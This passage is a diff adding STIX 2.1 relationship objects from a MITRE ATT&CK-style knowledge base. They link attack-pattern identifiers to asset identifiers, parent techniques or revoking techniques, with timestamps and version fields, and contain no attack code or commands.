+ "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--ae69d304-4956-414e-8922-6961df263fa0", + "created": "2024-07-02T13:55:55.758Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.758Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--106c0cf6-bf73-4601-9aa8-0945c2715ec5", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--ae8d9cb9-b2f7-4544-9366-3202986ab8db", + "created": "2024-07-02T13:55:55.757Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.757Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--f2877f7f-9a4c-4251-879f-1224e3006bee", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--ae8d9f3e-9243-4702-a305-e4b53cd32351", + "created": "2019-12-03T14:15:27.693Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-08-14T13:10:28.809Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--8faedf87-dceb-4c35-b2a2-7286f59a3bc3", + "target_ref": "attack-pattern--35dd844a-b219-4e2b-a6bb-efa9a75995a9", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--aebf5b85-6097-48c3-84a6-d68b5bce5a3c", + "created": "2024-07-02T13:55:55.768Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.768Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--fe926152-f431-4baf-956c-4ad3cb0bf23b", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--aeca78fe-7514-44e1-b2b0-814a8e81764e", + "created": "2024-07-02T13:55:55.767Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.767Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--d456de47-a16f-4e46-8980-e67478a12dcb", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--aecee025-0bd4-4d16-9cdf-f70b2f26c4f0", + "created": "2024-07-02T13:55:55.748Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.748Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--3c4a2599-71ee-4405-ba1e-0e28414b4bc5", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--aee0e283-5bbd-4332-af46-f477d3ce38d6", + "created": "2020-02-04T12:59:37.774Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--2edd9d6a-5674-4326-a600-ba56de467286", + "target_ref": "attack-pattern--341e222a-a6e3-4f6f-b69c-831d792b1580", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--af019857-92d4-472a-9f6b-96f105badfb1", + "created": "2024-07-02T13:55:55.765Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.765Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--635cbe30-392d-4e27-978e-66774357c762", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--af093da1-0f6e-4305-aac2-adbad1463e67", + "created": "2024-06-21T14:12:20.264Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.264Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--f2877f7f-9a4c-4251-879f-1224e3006bee", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--af0fd36c-6e4b-4eb8-a850-5baace687e12", + "created": "2024-07-02T13:55:55.767Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.767Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--d0613359-5781-4fd2-b5be-c269270be1f6", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--af121747-7243-413b-af18-d3f3d32146fa", + "created": "2024-06-26T14:48:37.656Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T14:48:37.656Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--799ace7f-e227-4411-baa0-8868704f2a69", + "target_ref": "x-mitre-asset--65c04f96-37e5-4358-ab16-087e240c1b6e", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--af1e352d-bc39-4315-a38a-e583a785b60d", + "created": "2024-06-21T14:12:20.273Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.273Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--aedfca76-3b30-4866-b2aa-0f1d7fd1e4b6", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--af213f62-86ab-45dc-b815-27072a78e809", + "created": "2024-07-02T13:55:55.761Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.761Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--d2c4e5ea-dbdf-4113-805a-b1e2a337fb33", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--af25cacc-6b1a-47d2-8e13-cb2a7e92b379", + "created": "2023-09-28T21:17:32.313Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T21:17:32.313Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--40b300ba-f553-48bf-862e-9471b220d455", + "target_ref": "x-mitre-asset--ecb81a8b-022e-4529-a404-55cffca7d3a3", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--af282eee-82b9-4e16-8091-0c1d9236c916", + "created": "2024-06-21T14:12:20.262Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.262Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--ba04e672-da86-4e69-aa15-0eca5db25f43", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--af5197d1-c134-46d5-9600-f1c974c41c64", + "created": "2024-07-02T13:55:55.763Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.763Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--1b20efbf-8063-4fc3-a07d-b575318a301b", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--af773c1c-9497-4e56-8455-698b8bc30aa4", + "created": "2024-07-02T13:55:55.752Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.752Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--0c8ab3eb-df48-4b9c-ace7-beacaac81cc5", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--af7fbc57-8277-4032-897d-6ea7402e998d", + "created": "2024-06-26T13:44:33.541Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T13:44:33.541Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--890c9858-598c-401d-a4d5-c67ebcdd703a", + "target_ref": "x-mitre-asset--2821ca87-8f61-47e5-a3bf-524f65573d77", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--af802091-fee7-4d15-a845-fb4ee3c26d6d", + "created": "2023-09-29T16:44:42.393Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T16:44:42.393Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--be69c571-d746-4b1f-bdd0-c0c9817e9068", + "target_ref": "x-mitre-asset--69d1b1ef-e918-4cfd-9a98-29debd04cb32", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--af863f6b-8d48-4488-bb5c-40721550b2b4", + "created": "2024-07-02T13:55:55.752Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.752Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--1b20efbf-8063-4fc3-a07d-b575318a301b", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--af9a859a-4055-4b6e-8cb9-69e3f431d6ba", + "created": "2024-07-02T13:55:55.767Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.767Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--e6415f09-df0e-48de-9aba-928c902b7549", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--afa5ce87-e027-4588-b5fb-18463e44aed8", + "created": "2024-06-21T14:12:20.270Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.270Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--43f2776f-b4bd-4118-94b8-fee47e69676d", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--afa80a50-34c0-4dca-b213-a5e13de7fc64", + "created": "2024-07-02T13:55:55.757Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.757Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--ea071aa0-8f17-416f-ab0d-2bab7e79003d", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--afaa6cd5-ff04-479a-a3e6-c25a4154be4b", + "created": "2020-03-02T19:21:35.323Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--20138b9d-1aac-4a26-8654-a36b6bbf2bba", + "target_ref": "attack-pattern--2b742742-28c3-4e1b-bab7-8350d6300fa7", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--afb0685e-2c5c-4eec-9205-b1afdab4eda5", + "created": "2020-01-24T16:48:51.340Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--dce31a00-1e90-4655-b0f9-e2e71a748a87", + "target_ref": "attack-pattern--61afc315-860c-4364-825d-0d62b2e91edc", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--afcc8362-e43f-4be9-8fe4-c6c2ce4590b1", + "created": "2020-01-24T14:22:27.738Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--04ef4356-8926-45e2-9441-634b6f3dcecb", + "target_ref": "attack-pattern--10ff21b9-5a01-4268-a1b5-3b55015f1847", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--afdaeff7-15be-4d5d-80f0-467e66b620d2", + "created": "2024-06-27T09:28:41.087Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-27T09:28:41.087Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--09c4c11e-4fa1-4f8c-8dad-3cf8e69ad119", + "target_ref": "x-mitre-asset--dcb786af-f1e7-449e-be48-46315c9789ca", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--afe18ec4-b5b8-43f7-b9e9-64a579b4b4e1", + "created": "2023-09-29T17:37:41.336Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T17:37:41.336Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--3f1f4ccb-9be2-4ff8-8f69-dd972221169b", + "target_ref": "x-mitre-asset--68388d4f-8138-420b-be2b-5a7dfe9ff6b4", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--afe2e404-34c4-4a78-a57a-84612b48b355", + "created": "2024-07-02T13:55:55.765Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.765Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--799ace7f-e227-4411-baa0-8868704f2a69", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--aff2fb40-9ef5-42c9-bc7a-4939b509fbf1", + "created": "2023-09-29T16:40:30.440Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T16:40:30.440Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--8bb4538f-f16f-49f0-a431-70b5444c7349", + "target_ref": "x-mitre-asset--69d1b1ef-e918-4cfd-9a98-29debd04cb32", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--b001d78a-afd6-47bb-bdb5-73e967e35a13", + "created": "2022-09-29T18:30:12.366Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-29T18:30:12.366Z", + "description": "", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--2f41939b-54c3-41d6-8f8b-35f1ec18ed97", + "target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--b0055f0c-72a8-4a0d-9b6d-2819213ba41a", + "created": "2024-07-02T13:55:55.759Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.759Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--635cbe30-392d-4e27-978e-66774357c762", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--b0290270-3a41-4791-be41-365686098ca6", + "created": "2024-07-02T13:55:55.766Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.766Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--8c32eb4d-805f-4fc5-bf60-c4d476c131b5", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--b05016f4-950a-40f4-9fe2-e924d7455c28", + "created": "2019-12-19T20:21:21.900Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--791481f8-e96a-41be-b089-a088763083d4", + "target_ref": "attack-pattern--7f0ca133-88c4-40c6-a62f-b3083a7fbc2e", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--b05d3d71-e1e7-4f74-9af4-83082aa03664", + "created": "2024-07-02T13:55:55.763Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.763Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--15dbf668-795c-41e6-8219-f0447c0e64ce", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--b06a4886-2878-44d7-b0b7-9ff7d3133949", + "created": "2024-06-21T14:12:20.258Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.258Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--47f2d673-ca62-47e9-929b-1b0be9657611", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--b0734880-dde7-4552-8984-9a082b7c98ad", + "created": "2024-06-21T14:12:20.262Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.262Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--d273434a-448e-4598-8e14-607f4a0d5e27", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--b0945f9b-5608-472e-ad70-7b42c3e062a1", + "created": "2023-09-28T21:21:18.081Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T21:21:18.081Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--2900bbd8-308a-4274-b074-5b8bde8347bc", + "target_ref": "x-mitre-asset--e2c3336a-dd93-44d6-8246-f93cf132c499", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--b0a0fba5-83b5-4b2b-b3a5-0fccc6407fd6", + "created": "2024-06-26T14:46:45.719Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + 